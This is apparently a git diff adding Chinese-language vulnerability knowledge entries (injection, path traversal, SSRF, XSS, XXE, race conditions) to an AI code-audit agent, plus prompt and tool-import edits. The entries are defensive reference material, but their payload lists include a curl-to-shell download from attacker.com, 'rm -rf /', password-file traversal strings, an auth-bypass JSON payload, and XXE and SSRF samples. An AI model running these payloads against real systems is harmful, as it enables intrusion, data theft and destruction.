NoSQL注入针对MongoDB等NoSQL数据库,通过操纵查询对象来绕过认证或提取数据。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### MongoDB (Python)
|
||||
```python
|
||||
# 危险 - 直接使用用户输入构建查询
|
||||
db.users.find({"username": username, "password": password})
|
||||
# 攻击者可传入 {"$ne": ""} 绕过认证
|
||||
|
||||
# 危险 - $where操作符
|
||||
db.users.find({"$where": f"this.name == '{name}'"})
|
||||
```
|
||||
|
||||
### MongoDB (Node.js)
|
||||
```javascript
|
||||
// 危险
|
||||
db.collection('users').find({username: req.body.username});
|
||||
// 攻击者可传入 {$gt: ""} 或 {$ne: null}
|
||||
```
|
||||
|
||||
## 攻击载荷示例
|
||||
```json
|
||||
// 绕过认证
|
||||
{"username": {"$ne": ""}, "password": {"$ne": ""}}
|
||||
{"username": {"$gt": ""}, "password": {"$gt": ""}}
|
||||
|
||||
// 正则注入
|
||||
{"username": {"$regex": "^admin"}}
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 验证输入类型(确保是字符串而非对象)
|
||||
2. 使用白名单验证
|
||||
3. 避免使用$where操作符
|
||||
4. 使用mongoose等ODM的类型验证
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 类型验证
|
||||
if not isinstance(username, str):
|
||||
raise ValueError("Invalid username type")
|
||||
db.users.find({"username": str(username)})
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
COMMAND_INJECTION = KnowledgeDocument(
|
||||
id="vuln_command_injection",
|
||||
title="Command Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["command", "injection", "shell", "os", "system", "rce"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-78"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
命令注入允许攻击者在主机操作系统上执行任意命令,可能导致完全系统控制。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险
|
||||
os.system("ping " + user_input)
|
||||
os.popen("ls " + directory)
|
||||
subprocess.call("ls " + directory, shell=True)
|
||||
subprocess.Popen(cmd, shell=True)
|
||||
commands.getoutput("cat " + filename)
|
||||
|
||||
# 危险 - eval/exec
|
||||
eval(user_input)
|
||||
exec(user_code)
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
exec("ls " + userInput);
|
||||
execSync(`cat ${filename}`);
|
||||
spawn("sh", ["-c", userCommand]);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
system("ping " . $ip);
|
||||
exec("cat " . $file);
|
||||
shell_exec($cmd);
|
||||
passthru($command);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
```bash
|
||||
; ls -la
|
||||
| cat /etc/passwd
|
||||
`whoami`
|
||||
$(id)
|
||||
&& rm -rf /
|
||||
|| curl attacker.com/shell.sh | sh
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 避免使用shell=True
|
||||
2. 使用参数列表而非字符串
|
||||
3. 输入验证和白名单
|
||||
4. 使用安全的替代API
|
||||
5. 沙箱执行
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 参数列表
|
||||
subprocess.run(["ping", "-c", "4", validated_host], shell=False)
|
||||
|
||||
# 安全 - shlex转义
|
||||
import shlex
|
||||
subprocess.run(shlex.split(f"ping -c 4 {shlex.quote(host)}"))
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
CODE_INJECTION = KnowledgeDocument(
|
||||
id="vuln_code_injection",
|
||||
title="Code Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["code", "injection", "eval", "exec", "rce"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-94"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
代码注入允许攻击者注入并执行任意代码,通常通过eval()等动态执行函数。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险
|
||||
eval(user_input)
|
||||
exec(user_code)
|
||||
compile(user_code, '<string>', 'exec')
|
||||
|
||||
# 危险 - 模板注入
|
||||
template = Template(user_input)
|
||||
render_template_string(user_input)
|
||||
```
|
||||
|
||||
### JavaScript
|
||||
```javascript
|
||||
// 危险
|
||||
eval(userInput);
|
||||
new Function(userCode)();
|
||||
setTimeout(userCode, 1000);
|
||||
setInterval(userCode, 1000);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
eval($code);
|
||||
assert($code);
|
||||
preg_replace('/e', $code, $input); // PHP < 7
|
||||
create_function('', $code);
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 永远不要eval用户输入
|
||||
2. 使用AST解析代替eval
|
||||
3. 使用沙箱环境
|
||||
4. 白名单允许的操作
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用ast.literal_eval处理数据
|
||||
import ast
|
||||
data = ast.literal_eval(user_input) # 只允许字面量
|
||||
|
||||
# 安全 - 使用json解析
|
||||
import json
|
||||
data = json.loads(user_input)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,129 @@
|
|||
"""
|
||||
路径遍历漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
PATH_TRAVERSAL = KnowledgeDocument(
|
||||
id="vuln_path_traversal",
|
||||
title="Path Traversal",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["path", "traversal", "file", "directory", "lfi", "rfi"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-22", "CWE-23"],
|
||||
owasp_ids=["A01:2021"],
|
||||
content="""
|
||||
路径遍历允许攻击者访问应用程序根目录之外的文件,可能导致敏感信息泄露或代码执行。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - 直接拼接路径
|
||||
file_path = "/uploads/" + user_filename
|
||||
open(base_dir + request.args['file'])
|
||||
os.path.join(base_dir, user_input) # 仍然危险!
|
||||
|
||||
# 危险 - 文件下载
|
||||
@app.route('/download')
|
||||
def download():
|
||||
filename = request.args.get('file')
|
||||
return send_file(f'/files/{filename}')
|
||||
|
||||
# 危险 - 模板包含
|
||||
render_template(user_template)
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
const filePath = path.join(__dirname, req.query.file);
|
||||
fs.readFile('./uploads/' + filename);
|
||||
res.sendFile(req.params.path);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
include($_GET['page']);
|
||||
require($user_input);
|
||||
file_get_contents($filename);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
```
|
||||
../../../etc/passwd
|
||||
..\\..\\..\\windows\\system32\\config\\sam
|
||||
....//....//....//etc/passwd
|
||||
..%2f..%2f..%2fetc/passwd
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
|
||||
..%252f..%252f..%252fetc/passwd (双重编码)
|
||||
```
|
||||
|
||||
## 敏感文件目标
|
||||
```
|
||||
# Linux
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/etc/hosts
|
||||
/proc/self/environ
|
||||
/var/log/apache2/access.log
|
||||
|
||||
# Windows
|
||||
C:\\Windows\\System32\\config\\SAM
|
||||
C:\\Windows\\win.ini
|
||||
C:\\inetpub\\logs\\LogFiles
|
||||
|
||||
# 应用配置
|
||||
.env
|
||||
config.php
|
||||
settings.py
|
||||
application.yml
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有文件操作函数
|
||||
2. 用户输入是否用于构建路径
|
||||
3. 是否有路径规范化
|
||||
4. 是否验证最终路径在允许范围内
|
||||
|
||||
## 安全实践
|
||||
1. 验证和规范化路径
|
||||
2. 使用白名单
|
||||
3. 检查路径是否在允许目录内
|
||||
4. 使用安全的文件ID映射
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
import os
|
||||
|
||||
def safe_join(base_dir, user_path):
|
||||
# 规范化路径
|
||||
base_dir = os.path.abspath(base_dir)
|
||||
full_path = os.path.abspath(os.path.join(base_dir, user_path))
|
||||
|
||||
# 验证路径在基础目录内
|
||||
if not full_path.startswith(base_dir + os.sep):
|
||||
raise ValueError("Path traversal detected")
|
||||
|
||||
return full_path
|
||||
|
||||
# 使用
|
||||
try:
|
||||
safe_path = safe_join('/uploads', user_filename)
|
||||
with open(safe_path) as f:
|
||||
content = f.read()
|
||||
except ValueError:
|
||||
abort(403)
|
||||
|
||||
# 更安全 - 使用文件ID映射
|
||||
@app.route('/download/<file_id>')
|
||||
def download(file_id):
|
||||
file_record = File.query.get(file_id)
|
||||
if file_record and file_record.user_id == current_user.id:
|
||||
return send_file(file_record.path)
|
||||
abort(404)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,134 @@
|
|||
"""
|
||||
竞态条件漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
RACE_CONDITION = KnowledgeDocument(
|
||||
id="vuln_race_condition",
|
||||
title="Race Condition",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["race", "condition", "toctou", "concurrency", "thread"],
|
||||
severity="medium",
|
||||
cwe_ids=["CWE-362", "CWE-367"],
|
||||
owasp_ids=["A04:2021"],
|
||||
content="""
|
||||
竞态条件发生在多个操作之间存在时间窗口,攻击者可以利用这个窗口改变系统状态。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### TOCTOU (Time-of-Check to Time-of-Use)
|
||||
```python
|
||||
# 危险 - 检查和使用之间有时间窗口
|
||||
if os.path.exists(filepath): # 检查
|
||||
# 攻击者可在此时替换文件
|
||||
with open(filepath) as f: # 使用
|
||||
data = f.read()
|
||||
|
||||
# 危险 - 余额检查
|
||||
if user.balance >= amount: # 检查
|
||||
# 并发请求可能同时通过检查
|
||||
user.balance -= amount # 使用
|
||||
db.commit()
|
||||
```
|
||||
|
||||
### 双重支付/提现
|
||||
```python
|
||||
# 危险 - 无锁的余额操作
|
||||
@app.route('/withdraw', methods=['POST'])
|
||||
def withdraw():
|
||||
amount = request.json['amount']
|
||||
if current_user.balance >= amount:
|
||||
current_user.balance -= amount
|
||||
db.commit()
|
||||
return transfer_money(amount)
|
||||
```
|
||||
|
||||
### 文件操作竞态
|
||||
```python
|
||||
# 危险 - 临时文件
|
||||
import tempfile
|
||||
fd, path = tempfile.mkstemp()
|
||||
# 攻击者可能在此时访问或替换文件
|
||||
os.chmod(path, 0o644)
|
||||
```
|
||||
|
||||
### 会话竞态
|
||||
```python
|
||||
# 危险 - 会话更新
|
||||
session['cart_total'] = calculate_total()
|
||||
# 并发请求可能覆盖
|
||||
apply_discount(session['cart_total'])
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 检查-使用模式(if exists then use)
|
||||
2. 余额/库存等数值操作
|
||||
3. 文件创建和权限设置
|
||||
4. 无锁的数据库操作
|
||||
5. 会话状态修改
|
||||
|
||||
## 安全实践
|
||||
1. 使用数据库事务和锁
|
||||
2. 原子操作
|
||||
3. 使用文件锁
|
||||
4. 乐观锁/悲观锁
|
||||
5. 幂等性设计
|
||||
|
||||
## 修复示例
|
||||
|
||||
### 数据库锁
|
||||
```python
|
||||
# 安全 - 使用SELECT FOR UPDATE
|
||||
from sqlalchemy import select
|
||||
|
||||
@app.route('/withdraw', methods=['POST'])
|
||||
def withdraw():
|
||||
amount = request.json['amount']
|
||||
|
||||
with db.begin():
|
||||
# 行级锁
|
||||
user = db.execute(
|
||||
select(User).where(User.id == current_user.id).with_for_update()
|
||||
).scalar_one()
|
||||
|
||||
if user.balance >= amount:
|
||||
user.balance -= amount
|
||||
return transfer_money(amount)
|
||||
else:
|
||||
return "Insufficient balance", 400
|
||||
```
|
||||
|
||||
### 原子操作
|
||||
```python
|
||||
# 安全 - 原子更新
|
||||
from sqlalchemy import update
|
||||
|
||||
result = db.execute(
|
||||
update(User)
|
||||
.where(User.id == user_id)
|
||||
.where(User.balance >= amount) # 条件更新
|
||||
.values(balance=User.balance - amount)
|
||||
)
|
||||
if result.rowcount == 0:
|
||||
return "Insufficient balance", 400
|
||||
```
|
||||
|
||||
### 文件锁
|
||||
```python
|
||||
# 安全 - 使用文件锁
|
||||
import fcntl
|
||||
|
||||
with open(filepath, 'r+') as f:
|
||||
fcntl.flock(f.fileno(), fcntl.LOCK_EX)
|
||||
try:
|
||||
data = f.read()
|
||||
# 处理数据
|
||||
f.seek(0)
|
||||
f.write(new_data)
|
||||
finally:
|
||||
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,118 @@
|
|||
"""
|
||||
SSRF (服务端请求伪造) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
SSRF = KnowledgeDocument(
|
||||
id="vuln_ssrf",
|
||||
title="Server-Side Request Forgery (SSRF)",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["ssrf", "request", "url", "network", "internal", "cloud"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-918"],
|
||||
owasp_ids=["A10:2021"],
|
||||
content="""
|
||||
SSRF允许攻击者诱使服务器向内部资源或任意外部地址发起请求。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - 直接使用用户URL
|
||||
response = requests.get(user_provided_url)
|
||||
urllib.request.urlopen(url_from_user)
|
||||
httpx.get(user_url)
|
||||
|
||||
# 危险 - URL拼接
|
||||
base_url = "http://internal-api/"
|
||||
requests.get(base_url + user_path)
|
||||
|
||||
# 危险 - 图片/文件获取
|
||||
image_url = request.args.get('url')
|
||||
response = requests.get(image_url)
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
fetch(req.body.url);
|
||||
axios.get(userUrl);
|
||||
http.get(url, callback);
|
||||
```
|
||||
|
||||
## 攻击目标
|
||||
1. 内部服务 (localhost, 127.0.0.1, 内网IP)
|
||||
2. 云元数据服务
|
||||
- AWS: http://169.254.169.254/latest/meta-data/
|
||||
- GCP: http://metadata.google.internal/
|
||||
- Azure: http://169.254.169.254/metadata/
|
||||
3. 内部API和数据库
|
||||
4. 文件协议 (file://)
|
||||
|
||||
## 绕过技术
|
||||
```
|
||||
# IP绕过
|
||||
http://127.0.0.1 -> http://127.1 -> http://0
|
||||
http://localhost -> http://[::1]
|
||||
http://2130706433 (十进制)
|
||||
http://0x7f000001 (十六进制)
|
||||
|
||||
# DNS重绑定
|
||||
attacker.com -> 解析到内网IP
|
||||
|
||||
# URL解析差异
|
||||
http://evil.com@internal/
|
||||
http://internal#@evil.com
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有发起HTTP请求的地方
|
||||
2. URL参数是否来自用户
|
||||
3. 是否有URL白名单验证
|
||||
4. 是否限制了协议和端口
|
||||
|
||||
## 安全实践
|
||||
1. URL白名单验证
|
||||
2. 禁止访问内部IP地址
|
||||
3. 使用DNS解析验证
|
||||
4. 限制协议(仅http/https)
|
||||
5. 禁用重定向或限制重定向
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
import ipaddress
|
||||
from urllib.parse import urlparse
|
||||
|
||||
def is_safe_url(url):
|
||||
try:
|
||||
parsed = urlparse(url)
|
||||
|
||||
# 只允许http/https
|
||||
if parsed.scheme not in ['http', 'https']:
|
||||
return False
|
||||
|
||||
# 解析IP
|
||||
import socket
|
||||
ip = socket.gethostbyname(parsed.hostname)
|
||||
ip_obj = ipaddress.ip_address(ip)
|
||||
|
||||
# 禁止私有IP
|
||||
if ip_obj.is_private or ip_obj.is_loopback:
|
||||
return False
|
||||
|
||||
# 白名单域名
|
||||
if parsed.hostname not in ALLOWED_HOSTS:
|
||||
return False
|
||||
|
||||
return True
|
||||
except:
|
||||
return False
|
||||
|
||||
# 使用
|
||||
if is_safe_url(user_url):
|
||||
response = requests.get(user_url, allow_redirects=False)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,205 @@
|
|||
"""
|
||||
XSS (跨站脚本) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
XSS_REFLECTED = KnowledgeDocument(
|
||||
id="vuln_xss_reflected",
|
||||
title="Reflected XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "reflected", "javascript", "html", "injection"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
反射型XSS:恶意脚本来自当前HTTP请求,服务器将用户输入直接反射到响应中。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python/Flask
|
||||
```python
|
||||
# 危险 - 直接返回用户输入
|
||||
@app.route('/search')
|
||||
def search():
|
||||
query = request.args.get('q')
|
||||
return f"<h1>搜索结果: {query}</h1>"
|
||||
|
||||
# 危险 - 禁用自动转义
|
||||
return render_template_string(user_input)
|
||||
return Markup(user_input)
|
||||
```
|
||||
|
||||
### JavaScript/Express
|
||||
```javascript
|
||||
// 危险
|
||||
res.send(`<h1>Hello ${req.query.name}</h1>`);
|
||||
res.write(req.body.content);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
echo "Hello " . $_GET['name'];
|
||||
print($_POST['content']);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
```html
|
||||
<script>alert('XSS')</script>
|
||||
<img src=x onerror=alert('XSS')>
|
||||
<svg onload=alert('XSS')>
|
||||
javascript:alert('XSS')
|
||||
<body onload=alert('XSS')>
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 输出编码/HTML转义
|
||||
2. 使用模板引擎的自动转义
|
||||
3. Content-Type设置正确
|
||||
4. 使用CSP头
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用escape
|
||||
from markupsafe import escape
|
||||
return f"<h1>搜索结果: {escape(query)}</h1>"
|
||||
|
||||
# 安全 - 使用模板(自动转义)
|
||||
return render_template('search.html', query=query)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
XSS_STORED = KnowledgeDocument(
|
||||
id="vuln_xss_stored",
|
||||
title="Stored XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "stored", "persistent", "javascript", "database"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
存储型XSS:恶意脚本被存储在服务器(数据库、文件等),当其他用户访问时执行。
|
||||
|
||||
## 危险场景
|
||||
- 用户评论/留言板
|
||||
- 用户个人资料
|
||||
- 论坛帖子
|
||||
- 文件名/描述
|
||||
- 日志查看器
|
||||
|
||||
## 危险模式
|
||||
```python
|
||||
# 危险 - 存储未过滤的用户输入
|
||||
comment = request.form['comment']
|
||||
db.save_comment(comment) # 存储
|
||||
|
||||
# 危险 - 显示未转义的内容
|
||||
comments = db.get_comments()
|
||||
return render_template_string(f"<div>{comments}</div>")
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 追踪用户输入到数据库的流程
|
||||
2. 检查从数据库读取后的输出处理
|
||||
3. 关注富文本编辑器的处理
|
||||
4. 检查管理后台的数据展示
|
||||
|
||||
## 安全实践
|
||||
1. 输入时过滤/存储时转义
|
||||
2. 输出时始终转义
|
||||
3. 使用白名单HTML标签(如需富文本)
|
||||
4. 使用DOMPurify等库清理HTML
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用bleach清理HTML
|
||||
import bleach
|
||||
clean_comment = bleach.clean(comment, tags=['p', 'b', 'i'])
|
||||
db.save_comment(clean_comment)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
XSS_DOM = KnowledgeDocument(
|
||||
id="vuln_xss_dom",
|
||||
title="DOM-based XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "dom", "javascript", "client-side"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
DOM型XSS:漏洞存在于客户端JavaScript代码,通过修改DOM环境执行恶意脚本。
|
||||
|
||||
## 危险源 (Sources)
|
||||
```javascript
|
||||
// URL相关
|
||||
location.href
|
||||
location.search
|
||||
location.hash
|
||||
document.URL
|
||||
document.referrer
|
||||
|
||||
// 存储相关
|
||||
localStorage.getItem()
|
||||
sessionStorage.getItem()
|
||||
|
||||
// 消息相关
|
||||
window.postMessage
|
||||
```
|
||||
|
||||
## 危险汇 (Sinks)
|
||||
```javascript
|
||||
// 危险 - HTML注入
|
||||
element.innerHTML = userInput;
|
||||
element.outerHTML = userInput;
|
||||
document.write(userInput);
|
||||
document.writeln(userInput);
|
||||
|
||||
// 危险 - JavaScript执行
|
||||
eval(userInput);
|
||||
setTimeout(userInput, 1000);
|
||||
setInterval(userInput, 1000);
|
||||
new Function(userInput);
|
||||
|
||||
// 危险 - URL跳转
|
||||
location.href = userInput;
|
||||
location.assign(userInput);
|
||||
window.open(userInput);
|
||||
```
|
||||
|
||||
## 危险模式
|
||||
```javascript
|
||||
// 危险 - 从URL获取并直接使用
|
||||
const name = new URLSearchParams(location.search).get('name');
|
||||
document.getElementById('greeting').innerHTML = 'Hello ' + name;
|
||||
|
||||
// 危险 - hash注入
|
||||
const hash = location.hash.substring(1);
|
||||
document.getElementById('content').innerHTML = decodeURIComponent(hash);
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 使用textContent代替innerHTML
|
||||
2. 使用安全的DOM API
|
||||
3. 对URL参数进行验证
|
||||
4. 使用DOMPurify清理HTML
|
||||
|
||||
## 修复示例
|
||||
```javascript
|
||||
// 安全 - 使用textContent
|
||||
element.textContent = userInput;
|
||||
|
||||
// 安全 - 使用DOMPurify
|
||||
element.innerHTML = DOMPurify.sanitize(userInput);
|
||||
|
||||
// 安全 - 创建文本节点
|
||||
element.appendChild(document.createTextNode(userInput));
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,129 @@
|
|||
"""
|
||||
XXE (XML外部实体注入) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
XXE = KnowledgeDocument(
|
||||
id="vuln_xxe",
|
||||
title="XML External Entity (XXE) Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xxe", "xml", "entity", "injection", "ssrf"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-611"],
|
||||
owasp_ids=["A05:2021"],
|
||||
content="""
|
||||
XXE允许攻击者通过XML外部实体读取服务器文件、执行SSRF攻击或导致拒绝服务。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - lxml默认配置
|
||||
from lxml import etree
|
||||
doc = etree.parse(user_xml)
|
||||
doc = etree.fromstring(user_xml)
|
||||
|
||||
# 危险 - xml.etree (Python < 3.7.1)
|
||||
import xml.etree.ElementTree as ET
|
||||
ET.parse(user_xml)
|
||||
|
||||
# 危险 - xml.dom
|
||||
from xml.dom import minidom
|
||||
minidom.parseString(user_xml)
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 危险 - DocumentBuilder默认配置
|
||||
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||
DocumentBuilder db = dbf.newDocumentBuilder();
|
||||
Document doc = db.parse(userInput);
|
||||
|
||||
// 危险 - SAXParser
|
||||
SAXParserFactory spf = SAXParserFactory.newInstance();
|
||||
SAXParser parser = spf.newSAXParser();
|
||||
parser.parse(userInput, handler);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
$doc = simplexml_load_string($xml);
|
||||
$doc = new DOMDocument();
|
||||
$doc->loadXML($xml);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
|
||||
### 文件读取
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||
]>
|
||||
<root>&xxe;</root>
|
||||
```
|
||||
|
||||
### SSRF
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "http://internal-server/api">
|
||||
]>
|
||||
<root>&xxe;</root>
|
||||
```
|
||||
|
||||
### 拒绝服务 (Billion Laughs)
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE lolz [
|
||||
<!ENTITY lol "lol">
|
||||
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
|
||||
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||||
]>
|
||||
<root>&lol3;</root>
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有XML解析代码
|
||||
2. 是否禁用了外部实体
|
||||
3. 是否禁用了DTD处理
|
||||
4. 用户输入是否直接解析
|
||||
|
||||
## 安全实践
|
||||
1. 禁用外部实体
|
||||
2. 禁用DTD处理
|
||||
3. 使用JSON代替XML
|
||||
4. 输入验证
|
||||
|
||||
## 修复示例
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 安全 - lxml禁用实体
|
||||
from lxml import etree
|
||||
parser = etree.XMLParser(
|
||||
resolve_entities=False,
|
||||
no_network=True,
|
||||
dtd_validation=False,
|
||||
load_dtd=False
|
||||
)
|
||||
doc = etree.parse(user_xml, parser)
|
||||
|
||||
# 安全 - defusedxml
|
||||
import defusedxml.ElementTree as ET
|
||||
doc = ET.parse(user_xml)
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 安全 - 禁用外部实体
|
||||
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -34,7 +34,7 @@ ORCHESTRATOR_SYSTEM_PROMPT = """你是一个专业的代码安全审计 Agent,
|
|||
## 分析方法
|
||||
1. **快速扫描**: 首先使用 pattern_match 快速发现可疑代码
|
||||
2. **语义搜索**: 使用 rag_query 查找相关上下文
|
||||
3. **深度分析**: 对可疑代码使用 code_analysis 深入分析
|
||||
3. **深度分析**: 对可疑代码使用 read_file 读取并分析
|
||||
4. **数据流追踪**: 追踪用户输入到危险函数的路径
|
||||
5. **漏洞验证**: 在沙箱中验证发现的漏洞
|
||||
|
||||
|
|
@ -67,7 +67,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是一个专注于代码漏洞分析的安全专
|
|||
## 可用工具
|
||||
- rag_query: 语义搜索相关代码
|
||||
- pattern_match: 快速模式匹配
|
||||
- code_analysis: LLM 深度分析
|
||||
- read_file: 读取文件内容
|
||||
- search_code: 关键字搜索
|
||||
- dataflow_analysis: 数据流分析
|
||||
|
|
|
|||
|
|
@ -1,7 +1,12 @@
|
|||
"""
|
||||
Agent 工具集
|
||||
提供 LangChain Agent 使用的各种工具
|
||||
包括内置工具和外部安全工具
|
||||
|
||||
提供 Agent 使用的各种工具,包括:
|
||||
- 基础工具(文件操作、代码搜索)
|
||||
- 分析工具(模式匹配、数据流分析)
|
||||
- 外部安全工具(Semgrep、Bandit等)
|
||||
- 协作工具(Think、Agent通信)
|
||||
- 报告工具(漏洞报告)
|
||||
"""
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
|
@ -22,6 +27,23 @@ from .external_tools import (
|
|||
OSVScannerTool,
|
||||
)
|
||||
|
||||
# 🔥 新增:思考和推理工具
|
||||
from .thinking_tool import ThinkTool, ReflectTool
|
||||
|
||||
# 🔥 新增:漏洞报告工具
|
||||
from .reporting_tool import CreateVulnerabilityReportTool
|
||||
|
||||
# 🔥 新增:Agent协作工具
|
||||
from .agent_tools import (
|
||||
CreateSubAgentTool,
|
||||
SendMessageTool,
|
||||
ViewAgentGraphTool,
|
||||
WaitForMessageTool,
|
||||
AgentFinishTool,
|
||||
RunSubAgentsTool,
|
||||
CollectSubAgentResultsTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 基础
|
||||
"AgentTool",
|
||||
|
|
@ -57,5 +79,21 @@ __all__ = [
|
|||
"SafetyTool",
|
||||
"TruffleHogTool",
|
||||
"OSVScannerTool",
|
||||
|
||||
# 🔥 思考和推理工具
|
||||
"ThinkTool",
|
||||
"ReflectTool",
|
||||
|
||||
# 🔥 漏洞报告工具
|
||||
"CreateVulnerabilityReportTool",
|
||||
|
||||
# 🔥 Agent协作工具
|
||||
"CreateSubAgentTool",
|
||||
"SendMessageTool",
|
||||
"ViewAgentGraphTool",
|
||||
"WaitForMessageTool",
|
||||
"AgentFinishTool",
|
||||
"RunSubAgentsTool",
|
||||
"CollectSubAgentResultsTool",
|
||||
]
|
||||
|
||||
|
|
|
|||
|
|
@ -0,0 +1,785 @@
|
|||
"""
|
||||
Agent 协作工具
|
||||
|
||||
提供动态Agent创建、通信和管理功能
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
from ..core.registry import agent_registry
|
||||
from ..core.message import message_bus, MessageType, MessagePriority
|
||||
|
||||
